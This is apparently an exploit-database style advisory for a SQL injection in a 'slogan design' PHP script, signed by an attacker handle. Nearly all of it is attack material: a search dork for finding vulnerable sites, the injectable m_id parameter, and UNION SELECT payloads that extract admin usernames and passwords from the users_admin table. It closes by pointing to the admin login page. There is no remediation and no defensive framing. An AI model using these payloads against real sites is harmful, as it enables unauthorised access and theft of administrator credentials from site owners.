Title: slogan design Script SQL Injection Vulnerability
3.1
http://www.slogandesign.co.il
Founded By Mr.P3rfekT --- We Will Not Go Down
Dork : " inurl:"index.php?m_id="
Exploit :
http://[site]/path/index.php?m_id={SQLi}
Poc Username:
union select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin
union select
1,2,3,4,5,6,7,8,pass,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin
http://[site]/union
select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin
http://[site]/admin/login.php